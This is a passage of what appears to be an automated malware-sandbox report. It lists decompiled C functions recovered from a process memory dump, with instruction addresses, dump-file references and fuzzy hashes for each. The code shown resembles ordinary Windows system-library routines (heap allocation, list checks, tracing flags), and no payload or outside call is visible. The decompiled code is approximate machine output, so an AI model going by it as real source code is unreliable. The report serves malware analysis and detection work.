						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E054514FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0546071b
0x05460724
0x05460734
0x05460738
0x0546074b
0x0546074b
0x05460753
0x05460753
0x05460759
0x0546075d
0x05460774
0x05460779
0x0546077d
0x05460789
0x05460795
0x054607a7
0x05460797
0x054607a0
0x054607a0
0x054607af
0x054607c4
0x054607cd
0x054607cd
0x054607af
0x054607dc

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 85f32921514b44ff0e87f7b25694594e6baab693e6517410d5bb1d7c81e9885d
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 6A21C5363082049FD715DF19C888BAABBA5FBC4750F04856EF9999B385D630DD09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 05417794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E05417794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x5487b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E053DF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E053B7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E053D9AE0();
					_t24 = L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x05417799
0x0541779a
0x0541779b
0x054177a3
0x054177ab
0x054177ae
0x054177b1
0x054177b1
0x054177bf
0x054177c4
0x054177c8
0x054177ce
0x054177d4
0x054177e0
0x054177e0
0x054177d6
0x054177d6
0x054177de
0x00000000
0x00000000
0x054177de
0x054177e5
0x054177f0
0x054177f3
0x054177f6
0x054177fd
0x05417800
0x0541780c
0x05417818
0x0541782b
0x0541781a
0x05417823
0x05417823
0x05417830
0x05417831
0x05417838
0x0541783d
0x0541783e
0x0541784f
0x0541784f
0x0541785a

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f72a5d188759f2f2d899b5eec70b9adf97df599e6dfcdc0295036c761c15e48
Instruction ID: 2e016e1d2f46332bfa862873f7ba59b56bac94263fb3af8b31aa27a0297470b7
Opcode Fuzzy Hash: 8f72a5d188759f2f2d899b5eec70b9adf97df599e6dfcdc0295036c761c15e48
Instruction Fuzzy Hash: BC21A772A00604AFC715DF59D894EA7B7B9FF48340F10056DF90AC7750DA34E900C794

Uniqueness

Uniqueness Score: -1.00%

Function 053BAE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E053BAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E053B7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E053B7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E053B7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E053B7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E05417794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x053bae78
0x053bae7c
0x053bae7e
0x053bae81
0x053bae86
0x053bae8d
0x05402691
0x053bae93
0x053bae93
0x053bae93
0x053bae98
0x053bae9d
0x054026a2
0x054026b4
0x054026a4
0x054026ad
0x054026ad
0x054026b9
0x00000000
0x054026bb
0x00000000
0x054026bb
0x053baea3
0x053baea3
0x053baea3
0x053baeaa
0x054026c0
0x054026c9
0x054026c9
0x053baeb3
0x054026d4
0x054026e1
0x00000000
0x00000000
0x054026e7
0x054026ee
0x054026f0
0x054026f9
0x054026f9
0x05402702
0x05402708
0x05402708
0x0540270b
0x0540270f
0x05402711
0x05402711
0x05402725
0x05402725
0x00000000
0x053baeb9
0x053baeb9
0x053baebf
0x053baebf
0x053baeb3

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 5c65bb483d253ec256393936c315090dc28911020d29516c3015a80ceef80254
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 8F21B0356096809BE716DB69C948BB677EAFF44290F2904F1DE048BBD2D7B5DC40C790

Uniqueness

Uniqueness Score: -1.00%

Function 053CFD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E053CFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E053A76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x053cfd9b
0x053cfda0
0x053cfda1
0x053cfdab
0x053cfdad
0x053cfdb0
0x053cfdb8
0x053cfe0f
0x053cfde6
0x053cfde9
0x053cfdec
0x0540c0c0
0x053cfdfe
0x053cfe06
0x053cfe06
0x0540c0c8
0x053cfe2d
0x053cfe2d
0x00000000
0x053cfe2d
0x0540c0d1
0x0540c0e0
0x0540c0e5
0x0540c0e5
0x0540c0e8
0x00000000
0x0540c0e8
0x053cfdf4
0x00000000
0x00000000
0x053cfdf6
0x053cfdfa
0x053cfe1a
0x053cfe1f
0x053cfe1f
0x053cfdfc
0x00000000
0x053cfdfc
0x053cfdcc
0x053cfdd0
0x053cfe26
0x00000000
0x053cfe26
0x053cfdd8
0x053cfddb
0x053cfddd
0x053cfde0
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: de69540c98ac9d2947dba5bc8013019600b8adbd0d845eceb0bebc4c22986fa0
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: E0217C72A04641DBD731CF59C544EA6FBEAFB94A10F2481BEE94687A15D770EC00CB80

Uniqueness

Uniqueness Score: -1.00%

Function 053CB390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E053CB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E053B2280(_t12, 0x5488608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E053D00C2(0x5488608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x053cb395
0x053cb3a2
0x053cb3a5
0x053cb3aa
0x053cb3b2
0x053cb3ba
0x053cb3bd
0x053cb3c0
0x053cb3c4
0x053cb3c9
0x0540a3e9
0x0540a3ed
0x0540a3f0
0x0540a3ff
0x0540a403
0x0540a409
0x00000000
0x00000000
0x0540a40b
0x0540a40b
0x0540a40f
0x0540a415
0x0540a423
0x0540a423
0x0540a415
0x053cb3d1
0x053cb3e8
0x053cb3e8
0x053cb3d9

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02883e03a2a980e30802acb7635a4b595e2ca26e6e15f9b6c87f849658d0ef42
Instruction ID: 1e44cad56f7035110f93d376d8d694fc2e038fe954edd5415b022bfef6adbe19
Opcode Fuzzy Hash: 02883e03a2a980e30802acb7635a4b595e2ca26e6e15f9b6c87f849658d0ef42
Instruction Fuzzy Hash: 2C114C373151105BCB28DA558D81ABBB7A7EBC5670B64017EDD16DB7C0DD315C02C794

Uniqueness

Uniqueness Score: -1.00%

Function 05399240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E05399240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x546f708);
				E053ED08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E053D95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E053D95D0();
				_t33 =  *0x54884c4; // 0x0
				L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x54884c4; // 0x0
				L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x54884c4; // 0x0
				E053B2280(L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x54886b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E053D95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E053D95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E05399325();
					_t50 =  *0x54884c4; // 0x0
					return E053ED0D1(L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x05399240
0x05399242
0x05399247
0x0539924c
0x0539924e
0x05399255
0x05399257
0x0539925a
0x0539925f
0x0539925f
0x05399266
0x05399271
0x05399276
0x05399279
0x0539927e
0x05399295
0x0539929a
0x053992b1
0x053992b6
0x053992d7
0x053992dc
0x053992e0
0x053992e6
0x053992e8
0x053992ee
0x05399332
0x05399333
0x05399337
0x05399338
0x0539933a
0x0539933a
0x0539933d
0x05399342
0x05399342
0x05399345
0x05399349
0x0539934e
0x05399352
0x05399357
0x053992f4
0x053992f4
0x053992f6
0x053992f9
0x05399300
0x05399306
0x05399324
0x05399324

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f613fb90a71c9ad943e0c3093f18e64bf3d1a9e5b4c04e96195fa88bf2d2549
Instruction ID: c51f2b1cb4c14e0b841b608da25a6d5c70bf27bb25c1f45bb5e58d4f5a8bdcbf
Opcode Fuzzy Hash: 1f613fb90a71c9ad943e0c3093f18e64bf3d1a9e5b4c04e96195fa88bf2d2549
Instruction Fuzzy Hash: 8D21B072250600DFC725EF68CA45FA9B7FAFF08B04F544A6CE1498BAA1DB74E941DB40

Uniqueness

Uniqueness Score: -1.00%

Function 05424257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E05424257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x54708d0);
				E053ED08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E054241E8(__ebx, __edi, __ecx, _t39);
				E053AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x54887e4;
					_t18 =  *0x54887e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x5485cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x54887e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x54887e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L05397055(_t31 + 0xfffffff8);
								_t24 =  *0x54887e0; // 0x0
								_t18 = _t24 - 1;
								 *0x54887e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x5485cd0;
				if( *0x5485cd0 <= 0) {
					L05397055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x54887e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x54887e8 = _t30;
						 *0x54887e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E053ED0D1(L05424320());
			}

0x05424257
0x05424257
0x05424257
0x05424259
0x0542425e
0x05424263
0x05424265
0x05424273
0x05424278
0x0542427c
0x0542427f
0x05424281
0x05424287
0x054242d7
0x054242d7
0x054242da
0x0542428d
0x0542428d
0x0542428f
0x05424292
0x05424297
0x0542429c
0x054242a0
0x054242a6
0x054242a8
0x054242ae
0x054242b3
0x00000000
0x054242ba
0x054242ba
0x054242bf
0x054242c5
0x054242ca
0x054242cf
0x054242d0
0x00000000
0x054242d0
0x054242b3
0x00000000
0x054242a6
0x0542429c
0x054242dc
0x054242dc
0x054242e3
0x05424309
0x054242e5
0x054242e5
0x054242e8
0x054242ee
0x054242f0
0x00000000
0x054242f2
0x054242f2
0x054242f4
0x054242f7
0x054242f9
0x05424300
0x05424300
0x054242f0
0x0542430e
0x0542431f

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a2cb8070d6416380177c836aedce6ae3c98f989b1e22aaf57497bd77a3c90bb
Instruction ID: 269c2e2d8d51dd0e7e5574252f2ddbac7af321d5178ad3757e4a0e4a8f7cb3d6
Opcode Fuzzy Hash: 7a2cb8070d6416380177c836aedce6ae3c98f989b1e22aaf57497bd77a3c90bb
Instruction Fuzzy Hash: C8217970A11A20CFCB19DF25D404AE9BBF2FB45794BA086AFD105DB390DB319441CF10

Uniqueness

Uniqueness Score: -1.00%

Function 054146A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E054146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E053DF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E053CD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L053B77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x054146b7
0x054146ba
0x054146c5
0x054146c8
0x054146d0
0x054146d4
0x054146e6
0x054146e9
0x054146f4
0x054146ff
0x05414705
0x05414706
0x0541470c
0x05414713
0x0541471b
0x05414723
0x05414725
0x054146d6
0x054146d9
0x054146db
0x054146db
0x05414732

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 81e87e7a42cfff8f0cc662f90bbd4c91a3c4f43a4a43bb0d32c60aa1a4b37dff
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: B611C272A04208BBCB059F5CD8809BEBBB9EF95304F1080AAF944CB351DA358D55D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0539C962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0539C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x548d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E053AEEF0(0x54870a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0541F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E053AEB70(_t29, 0x54870a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E053DB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0541F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x54870c0; // 0x0
					while(_t38 != 0x54870c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x548b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x0539c96a
0x0539c974
0x0539c988
0x0539c98a
0x05407c9d
0x05407c9f
0x05407ca4
0x05407cae
0x05407cf0
0x05407cf5
0x05407cfa
0x0539c992
0x0539c996
0x0539c997
0x0539c998
0x0539c9a3
0x0539c9a3
0x05407cb0
0x05407cb7
0x05407cbb
0x00000000
0x00000000
0x05407cbd
0x05407ce8
0x05407cc5
0x05407cc8
0x05407cca
0x05407cd0
0x05407cd6
0x05407cde
0x05407ce4
0x05407ce4
0x05407cd0
0x00000000
0x05407ce8
0x0539c990
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0453bb618d0d18b586568c10d11b4da53f25f1b9ebbb4600e9326cc7872cba23
Instruction ID: f6d70fd7c9c33bee0ce1e27796f0075797edc326dca63f876d1c3689d0b708db
Opcode Fuzzy Hash: 0453bb618d0d18b586568c10d11b4da53f25f1b9ebbb4600e9326cc7872cba23
Instruction Fuzzy Hash: 1611E0323186069BC714AE28DC599AFBBF6FB85620B20113AF84283691DF31BC14D7D2

Uniqueness

Uniqueness Score: -1.00%

Function 053D37F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E053D37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E053B2280(_t6, 0x5488550);
				}
				_t29 = E053D387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E053AFFB0(0x5488550, _t27, 0x5488550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x053d37fa
0x053d37fc
0x053d3805
0x053d3808
0x053d3808
0x053d3814
0x053d3818
0x053d3846
0x053d3848
0x053d384b
0x053d384b
0x053d3852
0x00000000
0x053d3854
0x053d3856
0x00000000
0x00000000
0x053d3863
0x00000000
0x053d3863
0x053d381a
0x053d381a
0x053d381f
0x053d386e
0x053d386e
0x053d3871
0x053d3873
0x053d3873
0x053d3868
0x00000000
0x053d3868
0x053d3821
0x053d3826
0x00000000
0x00000000
0x053d3828
0x053d382a
0x053d3841
0x00000000
0x053d3841

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 598422d363e671814c4f6c3d1c2e509078a9aebaee5526fa4900a8a0194a9d54
Instruction ID: 0721d18654536b9a2a8aa72bf7c23b1390a5395bef9780d2d1587c0dff86115a
Opcode Fuzzy Hash: 598422d363e671814c4f6c3d1c2e509078a9aebaee5526fa4900a8a0194a9d54
Instruction Fuzzy Hash: 990126B3A416209BC3378B19A940E3AFBB7EF81A60719486DE9058B600CB70CC05C7A1

Uniqueness

